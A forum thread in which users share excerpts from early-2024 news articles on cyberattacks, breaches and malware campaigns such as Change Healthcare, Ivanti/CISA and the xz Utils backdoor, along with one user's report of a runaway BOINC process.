Cyber Attacks and Hacking

[keith]

I doubt that this is related, but my computer ground to a halt a couple of days ago.

Checking out the who was using the CPU, I found some DLL that I had never heard of before (not unusual) up in the 90% range. I killed it and we went along smoothly for a while. It did come back after a few minutes. [sorry the dll name escapes me at the moment].

Dr. Google pointed me at something to do with number crunching of some sort, and I couldn't figure out what the heck it was from. So I just killed it again, even though it wasn't as obnoxious as before.

More interactions with Dr. Google and the dll started coming up in search results that also included the word BOINC .

Aha! Boinc was running some kind of numerical analysis and it had got well and truely out of control. I don't know if BOINC has been hacked, or they had a bad packet, or a bad project upgrade, but I killed BOINC for the time being.

I haven't made any attempt to contact BOINC about it, and it will probably come back next time I reboot. But I know about it now.

[RTH10260]

Note: above DNSSEC issue will cause problems on the DNS server, not on the user computer.

[RTH10260]

Pharmacies across US disrupted following hack at Change Healthcare network

By Raphael Satter and Sriparna Roy
February 23, 20244:07 AM GMT+1Updated 8 days ago

WASHINGTON, Feb 22 (Reuters) - Pharmacies across the United States are experiencing disruptions following a hack at UnitedHealth's (UNH.N), opens new tab technology unit, Change Healthcare, several pharmacy chains said in statements and on social media.

The problems began on Wednesday after a "suspected nation-state associated cybersecurity threat actor" gained access to Change Healthcare's information technology systems, UnitedHealth said in a filing on Thursday.

"Once we became aware of the outside threat, in the interest of protecting our partners and patients, we took immediate action to disconnect our systems to prevent further impact," Change Healthcare said on its status page. The company did not immediately respond to a request for further comment.

In its filing, UnitedHealth said it "cannot estimate the duration or extent of the disruption at this time." It said it had retained security experts and was working with law enforcement.

A variety of pharmacy chains said that the outage at Change Healthcare, a Tennessee-based provider of healthcare billing and data systems and a key node in the U.S. healthcare system, was having knock-on effects on their businesses.



https://www.reuters.com/business/health ... 024-02-22/

[RTH10260]

Hackers Leak 2.5M Private Plane Owners’ Data Linked to LA Intl. Airport Breach
The IntelBroker hacker has claimed responsibility for the breach.

WAQAS
FEBRUARY 23, 2024

IntelBroker informed Hackread.com that they successfully executed the data breach by exploiting a vulnerability within one of the CRM systems utilized by the Los Angeles International Airport.

The notorious hacker known as IntelBroker is making headlines once again with a daring alleged breach targeting one of the United States’ most critical organizations: the Los Angeles International Airport.

In a bold move, IntelBroker claims to have breached the database of the Los Angeles International Airport, making off with a trove of confidential user data belonging to private plane owners – The breach, according to the hacker, took place in February 2024.

It is important to note that no customer or traveller data is involved in this breach. However, the incident has apparently resulted in the compromise of a significant 2.5 million records, including sensitive information such as:

• Full names
  CPA numbers
  Email addresses (1.9 million emails – total 15,8000 emails after removing duplicates).
  Company names
  Plane model numbers
  Tail numbers (Refers to an identification number painted on an aircraft tail).

The breach was publicly disclosed by IntelBroker on the notorious hacker and cybercrime platform Breach Forums, adding another high-profile hack to their already extensive. Notable targets of IntelBroker’s previous hacks include the Weee! Grocery platform, General Electric, Staffing Giant Robert Half, and a recent data leak involving a partial Facebook Marketplace database.

Upon learning of the breach, Hackread.com promptly reached out to IntelBroker, who confirmed their involvement and provided limited insight into their methods. According to IntelBroker, they exploited a vulnerability in the airport’s Customer Relationship Management (CRM) system (CRM system) to gain unauthorized access to the database, highlighting the critical need for organizations to strengthen their cybersecurity measures in the face of growing threats from skilled hackers like IntelBroker.



https://www.hackread.com/hackers-leak-p ... rt-breach/

[RTH10260]

eBay, VMware, McAfee Sites Hijacked in Sprawling Phishing Operation
Trusted brands like The Economist are also among the 8,000 entities compromised by Operation SubdoMailing, which is at the heart of a larger operation of a single threat actor.

Elizabeth Montalbano, Contributing Writer
February 27, 2024

Attackers have compromised more than 8,000 subdomains from well-known brands and institutions to mount a sprawling phishing campaign that sends malicious emails numbering in the millions each day.

MSN, VMware, McAfee, The Economist, Cornell University, CBS, Marvel, and eBay are among the entities caught up in "SubdoMailing" — named by researchers from Guardio Labs who discovered the campaign, which is at the heart of a larger cybercriminal undertaking and undermines the trust and credibility of the compromised organizations, they said.

"The uncovered operation involves the manipulation of thousands of hijacked sub-domains belonging to or affiliated with big brands," head of Guardio Labs-Cybersecurity Nati Tal and security researcher Oleg Zaytsev wrote in a post on the content-sharing platform Medium. "Complex DNS manipulations for these domains allowed the dispatch of vast quantities of spammy and just outright malicious emails, falsely authorized under the guise of internationally recognized brands."

The campaign is crafted in such a way that emails appear to come from trusted domains and bypass all the industry-standard email-security measures typically in place to block suspicious messages, including Sender Policy Framework (SPF), DKIM, SMTP Server, and DMARC, the researchers said.



https://www.darkreading.com/application ... -operation

[RTH10260]

Black Basta, Bl00dy Ransomware Exploiting Recent ScreenConnect Flaws
The Black Basta and Bl00dy ransomware gangs have started exploiting two vulnerabilities in ConnectWise ScreenConnect.

ByIonut Arghire
February 27, 2024

More threat actors have started exploiting two recently resolved vulnerabilities in the ConnectWise ScreenConnect remote desktop access software.

The issues, tracked as CVE-2024-1709 (CVSS score of 10) and CVE-2024-1708 (CVSS score of 8.4), are described as an authentication bypass flaw and a path traversal bug.

ConnectWise disclosed the security defects on February 19, when it announced patches for them. Two days later, the company updated its advisory to warn of ongoing exploitation.

“Essentially, a bad actor could mimic the role as system admin, delete all other users and take over the instance,” the company notes in its advisory.

A proof-of-concept (PoC) exploit targeting the flaws, collectively referred to as SlashAndGrab, was made public last week, and threat actors quickly started exploiting them for malware delivery.

Now, Trend Micro says that more cybercrime groups have started exploiting the flaws, including the Black Basta and Bl00dy ransomware groups.

Following initial access to vulnerable servers, Black Basta was seen performing reconnaissance, discovery, and elevation of privilege activities, and deploying Cobalt Strike payloads.

In addition to searching for members of the ‘domain admin’ group, the attackers also added new accounts to the administrator group and deployed scripts to identify machines that recently connected to the Active Directory environment.



https://www.securityweek.com/black-bast ... ect-flaws/

[RTH10260]

US Sanctions Spyware Company and Executives Who Targeted American Journalists, Government Officials
The Treasury Department sanctioned individuals associated with Intellexa Consortium, maker of the powerful Predator Spyware.

ByAssociated Press
March 5, 2024

The Treasury Department announced Tuesday it has sanctioned two people and a Greece-based commercial spyware company headed by a former Israeli military officer that developed, operated and distributed technology used to target U.S. government officials, journalists and policy experts.

The sanctions target Intellexa Consortium, which the U.S. says has sold and distributed commercial spyware and surveillance tools for targeted and mass surveillance campaigns. Other entities associated with Intellexa — including North Macedonia-based Cytrox AD, Hungary-based Cytrox Holdings ZRT and Ireland-based Thalestris Limited — were sanctioned for their parts in developing and distributing a package of tools known as Predator.

Biden administration officials said it marks the first time that the Treasury Department has sanctioned people or entities for the misuse of spyware.

Predator allows a user to infiltrate electronic devices through zero-click attacks that require no user interaction for the spyware to infect the device. The spyware, which has been used in dozens of countries, has allowed for the unauthorized extraction of data, geolocation tracking and access to personal information on compromised devices.

“Today’s actions represent a tangible step forward in discouraging the misuse of commercial surveillance tools, which increasingly present a security risk to the United States and our citizens,” said Brian Nelson, Treasury undersecretary for terrorism and financial intelligence. “The United States remains focused on establishing clear guardrails for the responsible development and use of these technologies while also ensuring the protection of human rights and civil liberties of individuals around the world.”

The Commerce Department last year blacklisted Intellexa and Cytrox, denying them access to U.S. technology.

Amnesty International’s Security Lab in October published a report that said that Predator had been used to target but not necessarily infect devices connected to the president of the European Parliament, Roberta Metsola, and the president of Taiwan, Tsai Ing-Wen, as well as Rep. Michael McCaul, R-Texas, and Sen. John Hoeven, R-N.D.

Europe has also suffered a number of spyware incidents. Predator spyware was reportedly used in Greece, a revelation that helped precipitate the resignation in 2022 of two top government officials, including the national intelligence director.



https://www.securityweek.com/us-sanctio ... officials/

[RTH10260]

American Express Warns Credit Card Data Exposed in Third-Party Breach

5 MAR 2024
James Coker Deputy Editor, Infosecurity Magazine

Follow @ReporterCoker

American Express (Amex) has alerted customers that their credit card details may have been compromised following a third-party data breach.

In a notice letter to customers, filed with the US State of Massachusetts, the credit card provider warned that current or previously issued Amex card account numbers, customer names, and other card details such as the expiration date, may have been accessed in the attack.

The firm added that customers may receive additional notification letters if more than one of their Amex accounts were involved.

It is currently unknown how many customers may have been impacted by the incident.

The State of Massachusetts’ 2024 Data Breach Notification Report shows numerous third-party incidents reported by American Express in late February involving compromised credit card details.

Altogether, these add up to 33 impacted citizens from the state.



https://www.infosecurity-magazine.com/n ... a-exposed/

[RTH10260]

When the protectors themselves get hacked

CISA forced to take two systems offline last month after Ivanti compromise

Jonathan Greig, Suzanne Smalley
March 8th, 2024

Hackers breached the systems of the Cybersecurity and Infrastructure Security Agency (CISA) in February through vulnerabilities in Ivanti products, officials said.

A CISA spokesperson confirmed to Recorded Future News that the agency “identified activity indicating the exploitation of vulnerabilities in Ivanti products the agency uses” about a month ago.

“The impact was limited to two systems, which we immediately took offline. We continue to upgrade and modernize our systems, and there is no operational impact at this time,” the spokesperson said.

“This is a reminder that any organization can be affected by a cyber vulnerability and having an incident response plan in place is a necessary component of resilience.”

CISA declined to answer a range of questions about who was behind the incident, whether data had been accessed or stolen and what systems were taken offline. Ivanti makes software that organizations use to manage IT, including security and system access.

A source with knowledge of the situation told Recorded Future News that the two systems compromised were the Infrastructure Protection (IP) Gateway, which houses critical information about the interdependency of U.S. infrastructure, and the Chemical Security Assessment Tool (CSAT), which houses private sector chemical security plans. CISA declined to confirm or deny whether these are the systems that were taken offline.

CSAT houses some of the country’s most sensitive industrial information, including the Top Screen tool for high-risk chemical facilities, Site Security Plans and the Security Vulnerability Assessments.

CISA said organizations should review an advisory the agency released on February 29 warning that threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways including CVE-2023-46805, CVE-2024-21887 and CVE-2024-21893.

Last week, several of the world’s leading cybersecurity agencies revealed that hackers had discovered a way around a tool Ivanti released to help organizations check if they had been compromised.



https://therecord.media/cisa-takes-two- ... compromise

[RTH10260]

same based on above article

Top US cybersecurity agency hacked and forced to take some systems offline

Sean Lyngaas
Published 7:37 PM EST, Fri March 8, 2024

CNN — A federal agency in charge of cybersecurity discovered it was hacked last month and was forced to take two key computer systems offline, an agency spokesperson and US officials familiar with the incident told CNN.

One of the US Cybersecurity and Infrastructure Security Agency’s affected systems runs a program that allows federal, state and local officials to share cyber and physical security assessment tools, according to the US officials briefed on the matter. The other holds information on security assessment of chemical facilities, the sources said.

A CISA spokesperson said in a statement that “there is no operational impact at this time” from the incident and that the agency continues to “upgrade and modernize our systems.”

“This is a reminder that any organization can be affected by a cyber vulnerability and having an incident response plan in place is a necessary component of resilience,” the spokesperson said, adding that the impact from the hack “was limited to two systems, which we immediately took offline.”

The two systems run on older technology that was already set to be replaced, sources told CNN.

Part of the Department of Homeland Security, CISA investigates cyber intrusions at federal agencies and advises private critical infrastructure firms on how to bolster their security.

The Record first reported on the hack.

It was not immediately clear who was behind the hack, but it occurred through vulnerabilities in popular virtual private networking software made by Utah-based IT firm Ivanti. For several weeks, CISA has urged federal agencies and private firms to update their software or take other defensive measures in response to widespread exploitation of Ivanti vulnerabilities by hackers.

Among the hackers exploiting the flaws are a Chinese group focused on espionage, private researchers have previously told CNN.

While there is some irony in it, even cybersecurity agencies or officials can be victims of hacking. After all, they rely on the same technology that others do. The US’ top cybersecurity diplomat Nate Fick said last year that his personal account on social media platform X was hacked, calling it part of the “perils of the job.”



https://edition.cnn.com/2024/03/08/poli ... index.html

[RTH10260]

when the bad guys go really bad and turn on their own buddies ...

Incognito Darknet Market Mass-Extorts Buyers, Sellers

March 11, 2024

Borrowing from the playbook of ransomware purveyors, the darknet narcotics bazaar Incognito Market has begun extorting all of its vendors and buyers, threatening to publish cryptocurrency transaction and chat records of users who refuse to pay a fee ranging from $100 to $20,000. The bold mass extortion attempt comes just days after Incognito Market administrators reportedly pulled an “exit scam” that left users unable to withdraw millions of dollars worth of funds from the platform.

In the past 24 hours, the homepage for the Incognito Market was updated to include a blackmail message from its owners, saying they will soon release purchase records of vendors who refuse to pay to keep the records confidential.

“We got one final little nasty surprise for y’all,” reads the message to Incognito Market users. “We have accumulated a list of private messages, transaction info and order details over the years. You’ll be surprised at the number of people that relied on our ‘auto-encrypt’ functionality. And by the way, your messages and transaction IDs were never actually deleted after the ‘expiry’….SURPRISE SURPRISE!!! Anyway, if anything were to leak to law enforcement, I guess nobody never slipped up.”

Incognito Market says it plans to publish the entire dump of 557,000 orders and 862,000 cryptocurrency transaction IDs at the end of May.

“Whether or not you and your customers’ info is on that list is totally up to you,” the Incognito administrators advised. “And yes, this is an extortion!!!!”

The extortion message includes a “Payment Status” page that lists the darknet market’s top vendors by their handles, saying at the top that “you can see which vendors care about their customers below.” The names in green supposedly correspond to users who have already opted to pay.


The “Payment Status” page set up by the Incognito Market extortionists.

We’ll be publishing the entire dump of 557k orders and 862k crypto transaction IDs at the end of May, whether or not you and your customers’ info is on that list is totally up to you. And yes, this is an extortion!!!!

Incognito Market said it plans to open up a “whitelist portal” for buyers to remove their transaction records “in a few weeks.”

The mass-extortion of Incognito Market users comes just days after a large number of users reported they were no longer able to withdraw funds from their buyer or seller accounts. The cryptocurrency-focused publication Cointelegraph.com reported Mar. 6 that Incognito was exit-scamming its users out of their bitcoins and Monero deposits.

CoinTelegraph notes that Incognito Market administrators initially lied about the situation, and blamed users’ difficulties in withdrawing funds on recent changes to Incognito’s withdrawal systems.

Incognito Market deals primarily in narcotics, so it’s likely many users are now worried about being outed as drug dealers. Creating a new account on Incognito Market presents one with an ad for 5 grams of heroin selling for $450.



https://krebsonsecurity.com/2024/03/inc ... s-sellers/

[RTH10260]

Never-before-seen Linux malware gets installed using 1-day exploits
Discovery means that NerbianRAT is cross-platform used by for-profit threat group.

DAN GOODIN -
3/12/2024, 1:33 AM

Researchers have unearthed Linux malware that circulated in the wild for at least two years before being identified as a credential stealer that’s installed by the exploitation of recently patched vulnerabilities.

The newly identified malware is a Linux variant of NerbianRAT, a remote access Trojan first described in 2022 by researchers at security firm Proofpoint. Last Friday, Checkpoint Research revealed that the Linux version has existed since at least the same year, when it was uploaded to the VirusTotal malware identification site. Checkpoint went on to conclude that Magnet Goblin—the name the security firm uses to track the financially motivated threat actor using the malware—has installed it by exploiting “1-days,” which are recently patched vulnerabilities. Attackers in this scenario reverse engineer security updates, or copy associated proof-of-concept exploits, for use against devices that have yet to install the patches.

Checkpoint also identified MiniNerbian, a smaller version of NerbianRAT for Linux that’s used to backdoor servers running the Magento ecommerce server, primarily for use as command-and-control servers that devices infected by NerbianRAT connect to. Researchers elsewhere have reported encountering servers that appear to have been compromised with MiniNerbian, but Checkpoint Research appears to have been the first to identify the underlying binary.

“Magnet Goblin, whose campaigns appear to be financially motivated, has been quick to adopt 1-day vulnerabilities to deliver their custom Linux malware, NerbianRAT and MiniNerbian,” Checkpoint researchers wrote. “Those tools have operated under the radar as they mostly reside on edge-devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected.”

Checkpoint discovered the Linux malware while researching recent attacks that exploit critical vulnerabilities in Ivanti Secure Connect, which have been under mass exploitation since early January. In the past, Magnet Goblin has installed the malware by exploiting one-day vulnerabilities in Magento, Qlink Sense, and possibly Apache ActiveMQ.

In the course of its investigation into the Ivanti exploitation, Checkpoint found the Linux version of NerbianRAT on compromised servers that were under the control of Magnet Goblin. URLs included:



https://arstechnica.com/security/2024/0 ... -exploits/

[RTH10260]

Malware Campaign Exploits Popup Builder WordPress Plugin to Infect 3,900+ Sites

Mar 12, 2024
NewsroomWordPress / Website Security

A new malware campaign is leveraging a high-severity security flaw in the Popup Builder plugin for WordPress to inject malicious JavaScript code.

According to Sucuri, the campaign has infected more than 3,900 sites over the past three weeks.

"These attacks are orchestrated from domains less than a month old, with registrations dating back to February 12th, 2024," security researcher Puja Srivastava said in a report dated March 7.

Infection sequences involve the exploitation of CVE-2023-6000, a security vulnerability in Popup Builder that could be exploited to create rogue admin users and install arbitrary plugins.

The shortcoming was exploited as part of a Balada Injector campaign earlier this January, compromising no less than 7,000 sites.

The latest set of attacks lead to the injection of malicious code, which comes in two different variants and is designed to redirect site visitors to other sites such as phishing and scam pages.

WordPress site owners are recommended to keep their plugins up-to-date as well as scan their sites for any suspicious code or users, and perform appropriate cleanup.



https://thehackernews.com/2024/03/malwa ... ilder.html

[RTH10260]

Roku cancels unauthorized subscriptions and provides refunds for 15k breached accounts

Jonathan Greig
March 11th, 2024

Roku said it canceled unauthorized subscriptions and refunded more than 15,000 accounts after discovering what they called “suspicious activity.”

The streaming TV giant — which reported $3.4 billion in revenue last year — said that from the end of December to the end of February, hackers used username and password combinations breached from other services to login to user accounts.

“After gaining access, they then changed the Roku login information for the affected individual Roku accounts, and, in a limited number of cases, attempted to purchase streaming subscriptions,” the company said in breach notification letters.

“However, access to the affected Roku accounts did not provide the unauthorized actors with access to social security numbers, full payment account numbers, dates of birth, or other similar sensitive personal information requiring notification.”

Roku’s security team said that it notified law enforcement but did not wait for the investigation to conclude before taking action. After identifying potentially impacted Roku accounts, the security team forced password resets and investigated the account activity to determine whether the hackers had made any unauthorized charges.

Any charges that were unauthorized were canceled and users were refunded.

The company did not respond to requests for comment about how they were able to distinguish between legitimate charges and ones connected to hacker activity.



https://therecord.media/roku-unauthoriz ... nt-refunds

[RTH10260]

The French Government Says It’s Being Targeted by Unusual Intense Cyberattacks
A group of hackers called Anonymous Sudan, considered by cybersecurity experts as pro-Russia, claimed responsibility for the attacks in online posts.

By Associated Press
March 11, 2024

The French government said Monday that several of its services have been targeted by cyberattacks of “unprecedented intensity,” and a special crisis center was activated to restore online services.

Prime Minister Gabriel Attal’s office said in a statement that the attacks started Sunday night and hit multiple government ministries, without providing details. By Monday afternoon, it said, “the impact of the attacks has been reduced for most services and access to government sites restored.”

A group of hackers called Anonymous Sudan, which is considered by cybersecurity experts as pro-Russia, claimed responsibility for the attacks in online posts. The French prime minister’s office and digital safety agency wouldn’t comment on the claim, or provide details of what was targeted or what damage might have been caused.

A French official said they were denial-of-service attacks, a common type of cyberattack that involves flooding a site with data in order to overwhelm it and knock it offline.

France’s government has made a push to improve cyber defenses before the Paris Olympics this summer and after damaging ransomware attacks in recent years, including on hospitals in 2021.

The French government has accused Russia of operating a long-running online manipulation campaign against Ukraine’s Western backers, including by mirroring the French Foreign Ministry website among other methods. President Emmanuel Macron has taken an increasingly tough line against Moscow and the war that Russian President Vladimir Putin started in Ukraine.



https://www.securityweek.com/the-french ... erattacks/

[RTH10260]

old stuff only recently fixed

ICS/OT Exploited Building Access System Vulnerability Patched 5 Years After Disclosure
Vulnerabilities affecting a Nice Linear physical access product, including an exploited flaw, patched five years after their disclosure.

By Eduard Kovacs
March 12, 2024

Vulnerabilities affecting Linear building access control products, including a security flaw that has been exploited in the wild, have been patched nearly five years after their initial disclosure.

In May 2019, at SecurityWeek’s ICS Cyber Security Conference, Gjoko Krstic, a researcher who at the time worked for industrial cybersecurity firm Applied Risk, disclosed information on more than 100 vulnerabilities found in building management and access control systems from Nortek, Prima Systems, Optergy, and Computrols.


https://www.securityweek.com/exploited- ... isclosure/

[RTH10260]

even the IT industry leader needs to fix it's stuff

Microsoft Discloses Critical Hyper-V Flaws in Low-Volume Patch Update
Microsoft has disclosed fewer flaws and zero-days in the first three months of 2024 compared with the first quarter of the prior four years.

Jai Vijayan, Contributing Writer
March 12, 2024

Microsoft issued patches for 60 unique CVEs in its Patch Tuesday security update for March, only two of which are rated as "critical" and needing priority attention. Both affect the Windows Hyper-V virtualization technology: CVE-2024-21407, a remote code execution (RCE) bug; and CVE-2024-21408, which is a denial-of-service (DoS) vulnerability.

The update includes fixes for a total of 18 RCE flaws and two dozen elevation-of-privilege vulnerabilities, some of which allow threat actors to gain administrative control of affected systems.

Notably, several vulnerabilities that Microsoft assesses as being only of "important" severity and less likely to be exploited still have severity scores of more than 9.0 out of 10 on the CVSS vulnerability-severity scale because of their potential impact, if abused.

"This month's Patch Tuesday presents a reduction in fixed vulnerabilities from Microsoft, totaling 60, a decrease from last month's 74 updates," Mike Walters, president and co-founder of Action1, wrote in emailed comments. "Notably absent this month are any zero-day vulnerabilities or proofs of concept (PoCs), underscoring a moment of relative calm."

Critical RCE, DoS Hyper-V Vulnerabilities

The RCE bug in Hyper-V gives attackers a way to take complete control of affected systems and potentially compromise virtual machines housed on the Hyper-V server, says Sarah Jones, cyber threat intelligence research analyst at Critical Start.

The DoS vulnerability, meanwhile, allows an adversary to crash the Hyper-V service, rendering it unusable.

"This could prevent users from accessing virtual machines (VMs) hosted on the Hyper-V server, potentially causing significant disruption to critical business operations," Jones notes. "If you use Hyper-V, it is crucial to install the security updates immediately to address these critical vulnerabilities and protect your systems."



https://www.darkreading.com/vulnerabili ... tch-update

[RTH10260]

US and UK unveil sanctions against Chinese state-backed hackers over alleged ‘malicious’ attacks
The US alleges the individuals were working as a front for Beijing in an indictment and sanctions announcement

Nick Robins-Early and agencies
Tue 26 Mar 2024 05.20 CET

Hackers backed by China’s government spy agency have been accused by the US and UK of conducting a years-long cyber-attack campaign, targeting politicians, journalists and businesses.

The operation saw political dissidents and critics of China targeted by sophisticated phishing campaigns, according to the US, which resulted in some emails systems and networks being compromised.

The US government announced sanctions on Monday against hackers that it alleges were responsible for operating the scheme. Two individuals and a front company linked to the cyber-espionage group APT31, which is associated with the Chinese ministry of state security, have been hit with sanctions by the UK.

On Tuesday, the New Zealand government said it had also raised concerns with the Chinese government about its involvement in an attack which targeted the country’s parliamentary entities in 2021.

The US treasury’s office of foreign assets control stated that it sanctioned Wuhan Xiaoruizhi Science and Technology Company Ltd, which it calls a front for the Chinese ministry of state security that has “served as cover for multiple malicious cyberoperations”.

In press releases and unsealed indictment, the US government accused China of perpetrating an elaborate and invasive state-backed hacking program that goes back over a decade. Merrick Garland, the US Attorney General, called the hacking operation proof of “the ends to which the Chinese government is willing to go to target and intimidate its critics”.

The treasury office named two Chinese nationals, Zhao Guangzong and Ni Gaobin, affiliated with the Wuhan company, for cyberoperations that targeted US critical infrastructure sectors including defense, aerospace and energy. It also listed these threats as part of the cyber hacking group APT 31, which stands for “advanced persistent threat” and includes state-sponsored contract hackers and intelligence officers.

“APT 31 has targeted a wide range of high-ranking US government officials and their advisors integral to US national security,” the department said in a press release.

The US Department of Justice charged Zhao, Ni, and five other hackers with conspiracy to commit computer intrusions and wire fraud. The agency said they were part of a 14-year long cyber operation “targeting US and foreign critics, businesses and political officials”.

“Today’s announcements underscore the need to remain vigilant to cybersecurity threats and the potential for cyber-enabled foreign malign influence efforts, especially as we approach the 2024 election cycle,” Matthew G Olsen, the assistant attorney general, said.



https://www.theguardian.com/technology/ ... se-hackers

[RTH10260]

New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics

Mar 18, 2024
NewsroomCybercrime / Cryptocurrency

A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information.

Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it's likely associated with the North Korean state-sponsored group tracked as Kimsuky (aka Emerald Sleet, Springtail, or Velvet Chollima).

"The malware payloads used in the DEEP#GOSU represent a sophisticated, multi-stage threat designed to operate stealthily on Windows systems especially from a network-monitoring standpoint," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a technical analysis shared with The Hacker News.

"Its capabilities included keylogging, clipboard monitoring, dynamic payload execution, and data exfiltration, and persistence using both RAT software for full remote access, scheduled tasks as well as self-executing PowerShell scripts using jobs."

A notable aspect of the infection procedure is that it leverages legitimate services such as Dropbox or Google Docs for command-and-control (C2), thus allowing the threat actor to blend undetected into regular network traffic.

On top of that, the use of such cloud services to stage the payloads allows for updating the functionality of the malware or delivering additional modules.

The starting point is said to be a malicious email attachment containing a ZIP archive with a rogue shortcut file (.LNK) that masquerades as a PDF file ("IMG_20240214_0001.pdf.lnk").

The .LNK file comes embedded with a PowerShell script as well as a decoy PDF document, with the former also reaching out to an actor-controlled Dropbox infrastructure to retrieve and execute another PowerShell script ("ps.bin").




https://thehackernews.com/2024/03/new-d ... rgets.html

[RTH10260]

From Delivery To Execution: An Evasive Azorult Campaign Smuggled Through Google Sites

Mar 15 2024
By Jan Michael Alcantara

Summary

Netskope Threat Labs has observed an evasive Azorult campaign in the wild that employs multiple defense evasion techniques from delivery through execution to fly under the defender’s radar as it steals sensitive data.

Azorult is an information stealer first discovered in 2016 that steals sensitive information including user credentials, browser information, and crypto wallet data. Azorult is on the rise and is currently one of the top malware families that Netskope Threat Labs has observed targeting the healthcare industry over the last year.

In this blog post, Netskope Threat Labs performs a detailed teardown of an evasive AzoruIt malware campaign we observed in the wild. This campaign is noteworthy for the following reasons:

• It delivers its initial payload through HTML smuggling, a detection evasion technique that is gaining popularity among adversaries. This defense evasion technique was also used by a nation-state group to smuggle a remote access trojan, and by Nokoyawa ransomware, where they started the infection process through HTML smuggling.
  It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website.
  It executes the fileless Azorult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts.
  It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.
  It steals sensitive data, including information for 137 distinct crypto wallets, login credentials, browser files, and important documents.

Google Sites serves as a decoy for HTML smuggling

HTML smuggling is a defense evasion technique that aims to bypass web controls that block risky file types. It abuses legitimate HTML5 download attributes and Javascript blobs to construct malicious payloads on the client side, bypassing network security filters.



https://www.netskope.com/blog/from-deli ... ogle-sites

[RTH10260]

Fujitsu: Malware on Company Computers Exposed Customer Data
It remains unclear how long the IT services giant's systems were infiltrated and just how the cyberattack unfolded.

Becky Bracken, Senior Editor, Dark Reading
March 18, 2024

Global business technology colossus Fujitsu issued an apology for exposing customer data, following an investigation precipitated by the discovery of malware on the company's computers.

The Japanese corporation confirmed the cyber incident in a statement issued on March 15.

"After confirming the presence of malware, we immediately disconnected the affected business computers and took measures such as strengthening monitoring of other business computers," Fujitsu said in a statement translated by Google into English. "Additionally, we are currently continuing to investigate the circumstances surrounding the malware's intrusion and whether information has been leaked."

The multinational corporation said it reported the incident to Japanese regulators at the Personal Information Protection Commission.

What remains unclear is exactly how long the data was exposed, which is something Fujitsu customers should want to know, Roger Grimes, data-driven defense evangelist at KnowBe4, explained in a statement. Fujitsu also needs to provide additional details about the breach itself, he said.

"It's especially important to understand how the breach happened," Grimes said. "In order for an impacted customer to regain trust, they need to learn how the attack happened and what steps Fujitsu were taking to make sure it did not happen again (at least using the same attacker methods)."

Fujitsu's Cyber Posture Typical Among Enterprises

This incident highlights the need for enterprises to engage in more proactive cybersecurity strategies, Darren Williams, CEO and founder of BlackFog, said in response to the Fujitsu data leak.

"The reliance on defensive strategies is no longer sufficient and all organizations must refocus on data security," Williams explained in a statement. "As we have seen countless times, cybercriminals will always find a way in, and once they have your data, there is no limit to what they can do to leverage it."

Colin Little, security engineer at Centripetal, sees organizations like Fujitsu far too often learning after the fact that their data has been exposed. He added it can be a very emotional experience for enterprise cybersecurity teams.

"I reassure them, saying that this is an all-too-common finding in the world we live in today; that they are, by and large, not alone," Little said. "This current event is case-in-point: If a global company with as much money and human resources is having the same struggle as the rest of us to limit the depth and damage of intrusions, a different approach is required to be proactive against today's cyber threat."



https://www.darkreading.com/cyberattack ... tomer-data

[RTH10260]

How one volunteer stopped a backdoor from exposing Linux systems worldwide
An off-the-clock Microsoft worker prevented malicious code from spreading into widely-used versions of Linux via a compression format called XZ Utils.

By Amrita Khalid
Apr 3, 2024, 1:38 AM GMT+2

Linux, the most widely used open source operating system in the world, narrowly escaped a massive cyber attack over Easter weekend, all thanks to one volunteer.

The backdoor had been inserted into a recent release of a Linux compression format called XZ Utils, a tool that is little-known outside the Linux world but is used in nearly every Linux distribution to compresses large files, making them easier to transfer. If it had spread more widely, an untold number of systems could have been left compromised for years.

And as Ars Technica noted in its exhaustive recap, the culprit had been working on the project out in the open.

The vulnerability, inserted into Linux’s remote log-in, only exposed itself to a single key, so that it could hide from scans of public computers. As Ben Thompson writes in Stratechery. “the majority of the world’s computers would be vulnerable and no one would know.”

The story of the XZ backdoor’s discovery starts in the early morning of March 29th, as San Francisco-based Microsoft developer Andres Freund posted on Mastodon and sent an email to OpenWall’s security mailing list with the heading: “backdoor in upstream xz/liblzma leading to ssh server compromise.”

Freund, who volunteers as a “maintainer” for PostgreSQL, a Linux-based database, noticed a few strange things over the past few weeks while running tests. Encrypted log-ins to liblzma, part of the XZ compression library, were using up a ton of CPU. None of the performance tools he used revealed anything, Freund wrote on Mastodon. This immediately made him suspicious, and he remembered an “odd complaint” from a Postgres user a couple of weeks earlier about Valgrind, Linux’s program that checks for memory errors.

After some sleuthing, Freund eventually discovered what was wrong. “The upstream xz repository and the xz tarballs have been backdoored,” noted Freund in his email. The malicious code was in versions ​​5.6.0 and 5.6.1 of the xz tools and libraries.

Shortly after, enterprise opensource software company Red Hat sent out an emergency security alert for users of Fedora Rawhide and Fedora Linux 40. Ultimately, the company concluded that the beta version of Fedora Linux 40 contained two affected versions of the xz libraries. Fedora Rawhide versions likely received versions 5.6.0 or 5.6.1 as well.



https://www.theverge.com/2024/4/2/24119 ... or-attempt

[RTH10260]

Note: the original news item in the following post!

Backdoor found in widely used Linux utility targets encrypted SSH connections
Malicious code planted in xz Utils has been circulating for more than a month.

DAN GOODIN -
3/29/2024, 7:50 PM

Researchers have found a malicious backdoor in a compression tool that made its way into widely used Linux distributions, including those from Red Hat and Debian.

The compression utility, known as xz Utils, introduced the malicious code in versions ​​5.6.0 and 5.6.1, according to Andres Freund, the developer who discovered it. There are no known reports of those versions being incorporated into any production releases for major Linux distributions, but both Red Hat and Debian reported that recently published beta releases used at least one of the backdoored versions—specifically, in Fedora Rawhide and Debian testing, unstable and experimental distributions. A stable release of Arch Linux is also affected. That distribution, however, isn't used in production systems.

Because the backdoor was discovered before the malicious versions of xz Utils were added to production versions of Linux, “it's not really affecting anyone in the real world,” Will Dormann, a senior vulnerability analyst at security firm Analygence, said in an online interview. “BUT that's only because it was discovered early due to bad actor sloppiness. Had it not been discovered, it would have been catastrophic to the world.”

